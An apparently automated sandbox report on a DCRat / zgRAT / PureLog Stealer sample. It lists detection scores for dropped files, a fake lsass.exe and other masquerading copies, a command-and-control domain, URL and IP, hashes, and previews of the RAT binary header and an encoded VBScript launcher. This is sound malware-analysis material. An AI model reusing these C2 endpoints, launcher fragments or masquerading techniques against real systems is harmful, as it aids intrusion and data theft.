                                    C:\Program Files (x86)\Windows Media Player\Network Sharing\ZqsAyoZSZrLcIQRnmBOCJwJxHHOXc.exe83%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Program Files\Microsoft Office 15\ClientX64\ZqsAyoZSZrLcIQRnmBOCJwJxHHOXc.exe83%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Program Files\Windows Portable Devices\ZqsAyoZSZrLcIQRnmBOCJwJxHHOXc.exe83%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Recovery\lsass.exe83%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\AFUvvHdz.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\AsWoiMty.log25%ReversingLabs
                                    C:\Users\user\Desktop\CKyWUHyH.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\CYkgyfvY.log25%ReversingLabs
                                    C:\Users\user\Desktop\CmKYhHkf.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\EaXPTOzT.log8%ReversingLabs
                                    C:\Users\user\Desktop\FrxXNAmm.log25%ReversingLabs
                                    C:\Users\user\Desktop\GQmWAABO.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\HInMzsNO.log8%ReversingLabs
                                    C:\Users\user\Desktop\JeCeCscc.log8%ReversingLabs
                                    C:\Users\user\Desktop\LkfFbrxk.log25%ReversingLabs
                                    C:\Users\user\Desktop\MhHNxrMf.log8%ReversingLabs
                                    C:\Users\user\Desktop\MtSmEjDp.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\PgRkIPoV.log8%ReversingLabs
                                    C:\Users\user\Desktop\QXsvSdGP.log8%ReversingLabs
                                    C:\Users\user\Desktop\QrHcjUSw.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\RIKTmlsJ.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\TBLKldEI.log25%ReversingLabs
                                    C:\Users\user\Desktop\UKBLugCN.log25%ReversingLabs
                                    C:\Users\user\Desktop\UynSGdTD.log8%ReversingLabs
                                    C:\Users\user\Desktop\XVlEhDHN.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\XmyUnkUi.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\YBBlCWWw.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\ZPkAsstD.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\brdjWOxr.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\dhGiqFYl.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\gVSkXNZP.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\gtMhCYIK.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\gvHJzrMq.log8%ReversingLabs
                                    C:\Users\user\Desktop\heJamQmd.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\iAcIGVjp.log25%ReversingLabs
                                    C:\Users\user\Desktop\icHKrlAV.log25%ReversingLabs
                                    C:\Users\user\Desktop\kwMHLMmE.log25%ReversingLabs
                                    C:\Users\user\Desktop\nDKQhfgz.log8%ReversingLabs
                                    C:\Users\user\Desktop\nPayaidT.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\oZQzjlbX.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\phNJAZcc.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\qjmAjDHY.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\reDyPeef.log25%ReversingLabs
                                    C:\Users\user\Desktop\ryfhxvpx.log8%ReversingLabs
                                    C:\Users\user\Desktop\tIBixNUy.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\uhqhlNja.log8%ReversingLabs
                                    C:\Users\user\Desktop\vXhOtgDl.log25%ReversingLabs
                                    C:\Users\user\Desktop\whSGRYvh.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    No Antivirus matches
                                    SourceDetectionScannerLabelLink
                                    595506cm.n9shka.top15%VirustotalBrowse
                                    SourceDetectionScannerLabelLink
                                    http://595506cm.n9shka.topP0%Avira URL Cloudsafe
                                    http://595506cm.n9shka.top/100%Avira URL Cloudmalware
                                    http://595506cm.n9shka.top/BigloadgeneratortraffictestDatalifeTemp.php100%Avira URL Cloudmalware
                                    http://595506cm.n9shka.top100%Avira URL Cloudmalware
                                    http://595506cm.n9shka.top/BigloadgeneratortraffictestDatalifeTemp.php1%VirustotalBrowse
                                    http://595506cm.n9shka.top/15%VirustotalBrowse
                                    NameIPActiveMaliciousAntivirus DetectionReputation
                                    595506cm.n9shka.top
                                    37.44.238.250
                                    truetrueunknown
                                    NameMaliciousAntivirus DetectionReputation
                                    http://595506cm.n9shka.top/BigloadgeneratortraffictestDatalifeTemp.phptrue
                                    • 1%, Virustotal, Browse
                                    • Avira URL Cloud: malware
                                    unknown
                                    NameSourceMaliciousAntivirus DetectionReputation
                                    http://595506cm.n9shka.topPlsass.exe, 00000025.00000002.2463680007.0000000002A1A000.00000004.00000800.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://595506cm.n9shka.top/lsass.exe, 0000003A.00000002.2859804094.0000000003810000.00000004.00000800.00020000.00000000.sdmptrue
                                    • 15%, Virustotal, Browse
                                    • Avira URL Cloud: malware
                                    unknown
                                    http://595506cm.n9shka.toplsass.exe, 0000000A.00000002.1889556610.0000000002B36000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.1889556610.0000000002D07000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 00000011.00000002.2025489477.00000000037F4000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 00000011.00000002.2025489477.0000000003623000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.2110806554.0000000002C53000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.2110806554.0000000002E24000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.2251019858.0000000002E21000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.2251019858.0000000002C4F000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 00000020.00000002.2378415745.0000000002DAD000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 00000020.00000002.2378415745.0000000002F7E000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 00000025.00000002.2463680007.0000000002BEB000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 00000025.00000002.2463680007.0000000002A1A000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2555484716.000000000325D000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2555484716.000000000342E000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 00000030.00000002.2640928186.0000000002C1D000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 00000030.00000002.2640928186.0000000002DEE000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 00000035.00000002.2728259832.0000000002F4B000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 00000035.00000002.2728259832.0000000002D7A000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 0000003A.00000002.2859804094.0000000003810000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 0000003A.00000002.2859804094.00000000039E1000.00000004.00000800.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    unknown
                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameComponentBrowserruntimeHostNet.exe, 00000004.00000002.1759739963.000000000388F000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.1889556610.0000000002B36000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 00000011.00000002.2025489477.0000000003623000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.2110806554.0000000002C53000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.2251019858.0000000002C4F000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 00000020.00000002.2378415745.0000000002DAD000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 00000025.00000002.2463680007.0000000002A1A000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2555484716.000000000325D000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 00000030.00000002.2640928186.0000000002C1D000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 00000035.00000002.2728259832.0000000002D7A000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 0000003A.00000002.2859804094.0000000003810000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs
                                      IPDomainCountryFlagASNASN NameMalicious
                                      37.44.238.250
                                      595506cm.n9shka.topFrance
                                      49434HARMONYHOSTING-ASFRtrue
                                      Joe Sandbox version:41.0.0 Charoite
                                      Analysis ID:1569639
                                      Start date and time:2024-12-06 01:41:04 +01:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 11m 21s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Number of analysed new started processes analysed:63
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:Qsi7IgkrWa.exe
                                      renamed because original name is a hash value
                                      Original Sample Name:6296cf36bbbbe91b8ff186d18a08afa3.exe
                                      Detection:MAL
                                      Classification:mal100.troj.evad.winEXE@106/93@2/1
                                      EGA Information:
                                      • Successful, ratio: 66.7%
                                      HCA Information:Failed
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe
                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                      • Execution Graph export aborted for target lsass.exe, PID 1368 because it is empty
                                      • Execution Graph export aborted for target lsass.exe, PID 4128 because it is empty
                                      • Execution Graph export aborted for target lsass.exe, PID 5144 because it is empty
                                      • Execution Graph export aborted for target lsass.exe, PID 5804 because it is empty
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      TimeTypeDescription
                                      19:42:18API Interceptor10x Sleep call for process: lsass.exe modified
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      37.44.238.2504Awb1u1GcJ.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                      • 143840cm.nyashteam.ru/DefaultPublic.php
                                      s5duotgoYD.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                      • 500154cm.n9shteam.in/eternallineHttpprocessorwindowsDatalifedleprivatecentral.php
                                      QMT2731i8k.exeGet hashmaliciousDCRatBrowse
                                      • 117813cm.n9shteam.in/ExternalRequest.php
                                      EQdhBjQw4G.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                      • 861848cm.nyashkoon.ru/providerimageUpdateGameDatalifelocal.php
                                      3AAyq819Vy.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                      • 861848cm.nyashkoon.ru/providerimageUpdateGameDatalifelocal.php
                                      HcEvQKWAu2.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                      • 427176cm.nyashkoon.in/providerlinerequestpollSecureHttppublictempcentral.php
                                      k1iZHyRK6K.exeGet hashmaliciousDCRatBrowse
                                      • 452132cm.n9shteam2.top/Processdownloads.php
                                      FuWRu2Mg82.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                      • 114936cm.nyashcrack.top/EternalHttpprocessauthdbwordpressUploads.php
                                      cGZV10VyWC.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                      • aidvwbpa.top/pipeprocessauthBigloadprotectlocal.php
                                      qZoQEFZUnv.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                      • rollsroys.top/externaljsapisql.php
                                      No context
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      HARMONYHOSTING-ASFR4Awb1u1GcJ.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                      • 37.44.238.250
                                      http://clavity.meGet hashmaliciousUnknownBrowse
                                      • 185.157.247.125
                                      s5duotgoYD.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                      • 37.44.238.250
                                      QMT2731i8k.exeGet hashmaliciousDCRatBrowse
                                      • 37.44.238.250
                                      EQdhBjQw4G.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                      • 37.44.238.250
                                      3AAyq819Vy.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                      • 37.44.238.250
                                      HcEvQKWAu2.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                      • 37.44.238.250
                                      k1iZHyRK6K.exeGet hashmaliciousDCRatBrowse
                                      • 37.44.238.250
                                      FuWRu2Mg82.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                      • 37.44.238.250
                                      cGZV10VyWC.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                      • 37.44.238.250
                                      No context
                                      No context
                                      Process:C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe
                                      File Type:ASCII text, with very long lines (357), with no line terminators
                                      Category:dropped
                                      Size (bytes):357
                                      Entropy (8bit):5.762064313099226
                                      Encrypted:false
                                      SSDEEP:6:EmRULofdgzCeSvrySIUxMJSkBawqSAiZFrET1R4RLVgphWHjEP+C:E+GuNz5FlSAAFrYgRyPWD6+C
                                      MD5:90529183B0883943D36C699E92762A34
                                      SHA1:CD7BE0EA557DE5B1820DB222FB8DFC14E325EB82
                                      SHA-256:52950C2F59792785DD11D16546D000938B10568E4F63A8A4C80F8086D7440D85
                                      SHA-512:25FCBFA6B176A1D40ABF688ABC1A39E1A2B48E86DFF947792C96CC17594893616BC2D9C4364CFC602BEE0195EE12281A134013D78C1E81E9289FB76101D301A0
                                      Malicious:false
                                      Preview:p9TnNTWPvhC6dr4SCHcuSfgbB1n19Q4cnjcchjg5mBtK67b3dvO7XoDJc1lWpfQfnkS3ObudlgIRwWfDZtYNC6E8gT9p7JQHvOgVpipBAuW0gwXGWi65HCcrfTW4bEgbQAghzJY0EWMRkOcu63TYNU9swzzVMuj6O4kfPzQMKF1uzKGR1l8ivHO6AxvATCoTxQDqn6eGnHOHcP2ltidlwBLGpnecEQ3Hbi7jHan5G14n3Hdv5JRvjDgwF6BAbCBXNGp3STeS4he4GhNhJtg58HiXCKdLZneD0gawbkcmp81Bilpisd0sgGYGiS1HzT3QDbEjHaFjQ3PAQgyaf4c5xvhtITOJsVwVFk7Hg
                                      Process:C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):224
                                      Entropy (8bit):5.631833593103566
                                      Encrypted:false
                                      SSDEEP:3:pHTEWAHrElskbRQPaE9D/6qcqv0eUPyUGlyw59SrHSu9VU1FyXV42LvIckcXIx4h:pgFHngmn9j6nK0wOPXfQa52BXvr4es
                                      MD5:3AA8DF7BD1BF125FAF9C41F7812A3C23
                                      SHA1:56599FB88F0B32FD3137BB1C9C470972B212EB0F
                                      SHA-256:D6BFA336DD1E7D412C1A9F51BFC361FC8409C046116F3764866ED7BC26097BE3
                                      SHA-512:99069916BD2F77B8493432C01FF9E69B9AB04966D7047628244A1597CB98B014A45F9FF8FE409F3ECC0C54A5E24CA1B4D945727AEABF7A95F29DEF33993DE11B
                                      Malicious:false
                                      Preview:yO0AbiASbWOOOvmQEsnMxbsaVFnxEealWQOrAhl4fNEA58qwWNPWhEaXfZoV5MO65m27h5QhHsqjWsfXZ1b1OEES01Lk3Q9S9HETFsOb7sOyX0Ax4R6DvWr0hkHptpo1tXkPnMRqm94gzQ490XqmT5hmaNvfljrREXEAQvKs9PbwcLBRqIzW9Bhx08yZawFDRmbbL3tFM7mDevJOMeyctVRC0RKS6uRM
                                      Process:C:\Users\user\Desktop\Qsi7IgkrWa.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):112
                                      Entropy (8bit):5.037428017506391
                                      Encrypted:false
                                      SSDEEP:3:QIeZN+3kuEEM0XXR+EmThbikiXiQBHGvn:yZN1u+IUbhrln
                                      MD5:BFBF412350FA794765180EB365D663FB
                                      SHA1:04021BA70227E0A5F7CF29C7B85D0190F82D7F37
                                      SHA-256:B7A5DA4F22C70794C60B65E06512F5F3F9E2E2803E98A99567AB859FD56F0F60
                                      SHA-512:23B6B4429E43F8FE66B0E37908D1A0580A60938281928B7B98C9FC8FB531AB7C61BC426514990B6E97FA6A95D0509E8934B77480725C748ECEC20997E4371139
                                      Malicious:false
                                      Preview:%VrlZwI%%EzMOpZ%..%KickhhvmNvewS%"C:\HypercontainerServerhostDll/ComponentBrowserruntimeHostNet.exe"%WcHNbudbck%
                                      Process:C:\Users\user\Desktop\Qsi7IgkrWa.exe
                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):1916928
                                      Entropy (8bit):7.5383466252302025
                                      Encrypted:false
                                      SSDEEP:24576:xTkCAuXonymsrxQZgTOXw0iMyWU2FYEUhBpph/ukrhgSUkInLoA7JkXuTZSjAkDP:JJrx6sOXg8ghhfCSUkIkA7JkUZkuyiT
                                      MD5:BD5DF5DC5869453A2501A80C6FC937F4
                                      SHA1:CE691012B4A2A0D75DFB74D54F4F61AB6194FF91
                                      SHA-256:C7C51C52D0201DECD12006C38608E5E3C935708F5D5014268095040BFAE4E479
                                      SHA-512:F1A09D8691E0FB0185D14D34BBD664F60D0C3CE4C91D5AD8FCEAEA98F47B4CEC9394DEF0EF081D24A422EF15C55E2D5DDCD14AE65AFB1DE6986735398100EA7D
                                      Malicious:true
                                      Yara Hits:
                                      • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe, Author: Joe Security
                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe, Author: Joe Security
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 83%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.................8...........W... ...`....@.. ....................................@..................................V..K....`.. ............................................................................ ............... ..H............text...$7... ...8.................. ..`.rsrc... ....`.......:..............@....reloc...............>..............@..B.................W......H.......T...$...........x....t..LV.......................................0..........(.... ........8........E....\...)...8.......8W...(.... ....~....{....:....& ....8....(.... ....8....(.... ....~....{....9....& ....8....*....0..'....... ........8........E....~...........U...............8y...8.... ....8........~....(Z...~....(^... ....<W... ....~....{|...9....& ....8....~....9.... ....~....{....:l...& ....8a...8.... ....8R...r...ps....z*~....(R... .... .... ....s....~....(V...
                                      Process:C:\Users\user\Desktop\Qsi7IgkrWa.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):254
                                      Entropy (8bit):6.011491059508776
                                      Encrypted:false
                                      SSDEEP:6:GmwqK+NkLzWbHK/818nZNDd3RL1wQJRLIL7puQedLaiWEs:GLMCzWLKG4d3XBJl275edLaiC
                                      MD5:FCE58AB003F289BC419D62CE02F832FB
                                      SHA1:DFA69AE2CE984C05356FBA2074172BCE822ED518
                                      SHA-256:F7A2151AA23631BDE2FF93435F0209EC2A3F8F2AFF2B9024F75B5E20A70677B9
                                      SHA-512:9284E6ED46B9E60329ACB0F4829170FC047FF12990D7B7D8A0E0B739B59905A65318DDE0F95992B33A930211BD20D1759E745BE6A1F4FA2E58B94F58B514171F
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      Preview:#@~^5QAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2vvT!Zb@#@&j.Y,./4?4nV^PxP;DnCD+r(%+1Y`r.jmMkaY ?4n^VE#@#@&.ktj4.VV ]!x~J;lJCza+MmW.Ymrx.Dj+M\n.4W/D9V^zz;GX3DXRrKxLTgX2c_ef056{_/ff*opuCWeUKGyk.cS25&%4"c 4mYES,!~,Wl^/+m0kAAA==^#~@.
                                      Process:C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe
                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):1916928
                                      Entropy (8bit):7.5383466252302025
                                      Encrypted:false
                                      SSDEEP:24576:xTkCAuXonymsrxQZgTOXw0iMyWU2FYEUhBpph/ukrhgSUkInLoA7JkXuTZSjAkDP:JJrx6sOXg8ghhfCSUkIkA7JkUZkuyiT
                                      MD5:BD5DF5DC5869453A2501A80C6FC937F4
                                      SHA1:CE691012B4A2A0D75DFB74D54F4F61AB6194FF91
                                      SHA-256:C7C51C52D0201DECD12006C38608E5E3C935708F5D5014268095040BFAE4E479
                                      SHA-512:F1A09D8691E0FB0185D14D34BBD664F60D0C3CE4C91D5AD8FCEAEA98F47B4CEC9394DEF0EF081D24A422EF15C55E2D5DDCD14AE65AFB1DE6986735398100EA7D
                                      Malicious:true
                                      Yara Hits:
                                      • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\HypercontainerServerhostDll\TextInputHost.exe, Author: Joe Security
                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\HypercontainerServerhostDll\TextInputHost.exe, Author: Joe Security
                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\HypercontainerServerhostDll\TextInputHost.exe, Author: Joe Security
                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\HypercontainerServerhostDll\TextInputHost.exe, Author: Joe Security
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 83%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.................8...........W... ...`....@.. ....................................@..................................V..K....`.. ............................................................................ ............... ..H............text...$7... ...8.................. ..`.rsrc... ....`.......:..............@....reloc...............>..............@..B.................W......H.......T...$...........x....t..LV.......................................0..........(.... ........8........E....\...)...8.......8W...(.... ....~....{....:....& ....8....(.... ....8....(.... ....~....{....9....& ....8....*....0..'....... ........8........E....~...........U...............8y...8.... ....8........~....(Z...~....(^... ....<W... ....~....{|...9....& ....8....~....9.... ....~....{....:l...& ....8a...8.... ....8R...r...ps....z*~....(R... .... .... ....s....~....(V...
                                      Process:C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe
                                      File Type:ASCII text, with very long lines (784), with no line terminators
                                      Category:dropped
                                      Size (bytes):784
                                      Entropy (8bit):5.879956698453127
                                      Encrypted:false
                                      SSDEEP:24:0TQQUo75Br2pdg2PjJm3DV7IcN+FZx0W8w:u9dim2PCh7Ici8w
                                      MD5:80A4EFD592F82E36B1EDAB3E106D30F4
                                      SHA1:1A4B06D39E85C9233856F959C38472D4B72A87ED
                                      SHA-256:64FD5E566A314E951E30B2ACBC24B32CD8DEF6F20E09BD3E9CD5B19DB4F72633
                                      SHA-512:20BFE8BCE207463AA69EE17EEA992CB0BF1D2E3487F65A8EEAF06BF63AAB780D5281F478A771C47BC50D7C445B97FEBF62E2D8754DB6E5EB2D0FA6CB95E8A93F
                                      Malicious:false
                                      Preview:ZuJBZdSEykN67mT6VZl4taIbqa3GQTfmYCD9LPnX8FdWhUOiEifU8LC8lrV9kMxfEki5iUuFvO5o6v4VLUCsxKoN9FXe4owwR8R6wTAuxaiuPYB0x9xPKEr46V5d6PKHbIW8e7j1US4Xl37kDhr50hmMQXAbXgxhPbTHCCVzZ651KTSCXVZZiPQ4gJsH6IdxeWIKk0iAL1f3luC6F8DCHX9AKYk2UO3RcHXxLHbhwYOrtWSvHvB8FbqHXIALPqq68ObeXPv7gfPsJRQxGzviM4MBbPZDHQSGsRtf5xX1AEcjL78G1MEZ4HuECaDI0rzQNJA2iu1Sb4iIbmzdRTL4L2LkhpdfuPBSOMVC6FhHUw8AimmZlj0hg4EV7aV3QWiL3Q3PQwgLvEkZ4LB4DE4KZdwUHAFguo07NwHSsWIyCpvcUpbwYa0McXwZdjIPrAaGNmLHDsMq6FIurU9bjTIUynf0AsyJO2GCOpOreTspOJQXPCrJjqqY1GSjHUHV3CbD8FfCFR7QkcGoXHl7ApkiMsKIXokJMWwLsMYJgoERtZxZ9nM9tJUOb31Q4XpbrxDNq46KtbaWlSyw4vItblZCChuyVHPJ9mk5WjtFqBPSs8nIEEWJO59FXALIKHymLRW8s2ZUBDCZVHUE3luQvG4EneiVYk5jNnGblpaLoBHL2juQqHOiXi0FWRVNUE5bHdMrA2cOKilt9sMDuSpRVWMpwBFTUM1kGpDYWCPyoAXz6HGnFRdCZoFvRh49xI47rBnTpxrrC0mV8Xsp4bOC
                                      Process:C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe
                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):1916928
                                      Entropy (8bit):7.5383466252302025
                                      Encrypted:false
                                      SSDEEP:24576:xTkCAuXonymsrxQZgTOXw0iMyWU2FYEUhBpph/ukrhgSUkInLoA7JkXuTZSjAkDP:JJrx6sOXg8ghhfCSUkIkA7JkUZkuyiT
                                      MD5:BD5DF5DC5869453A2501A80C6FC937F4
                                      SHA1:CE691012B4A2A0D75DFB74D54F4F61AB6194FF91
                                      SHA-256:C7C51C52D0201DECD12006C38608E5E3C935708F5D5014268095040BFAE4E479
                                      SHA-512:F1A09D8691E0FB0185D14D34BBD664F60D0C3CE4C91D5AD8FCEAEA98F47B4CEC9394DEF0EF081D24A422EF15C55E2D5DDCD14AE65AFB1DE6986735398100EA7D
                                      Malicious:true
                                      Yara Hits:
                                      • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Windows Media Player\Network Sharing\ZqsAyoZSZrLcIQRnmBOCJwJxHHOXc.exe, Author: Joe Security
                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows Media Player\Network Sharing\ZqsAyoZSZrLcIQRnmBOCJwJxHHOXc.exe, Author: Joe Security
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 83%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.................8...........W... ...`....@.. ....................................@..................................V..K....`.. ............................................................................ ............... ..H............text...$7... ...8.................. ..`.rsrc... ....`.......:..............@....reloc...............>..............@..B.................W......H.......T...$...........x....t..LV.......................................0..........(.... ........8........E....\...)...8.......8W...(.... ....~....{....:....& ....8....(.... ....8....(.... ....~....{....9....& ....8....*....0..'....... ........8........E....~...........U...............8y...8.... ....8........~....(Z...~....(^... ....<W... ....~....{|...9....& ....8....~....9.... ....~....{....:l...& ....8a...8.... ....8R...r...ps....z*~....(R... .... .... ....s....~....(V...
                                      Process:C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe
                                      File Type:ASCII text, with very long lines (629), with no line terminators
                                      Category:dropped
                                      Size (bytes):629
                                      Entropy (8bit):5.890331261229539
                                      Encrypted:false
                                      SSDEEP:12:SBoVFEr4xpd6WKvMhC+A7aoX/tUjROLA92ehZRO6pEMIBBrmWP1xSwy/dupOVIDn:SBoVFFx38vMhBRLjUM2O79EMIBdtP1xR
                                      MD5:F354F17EA229CAE6F76D7280DA6EBF17
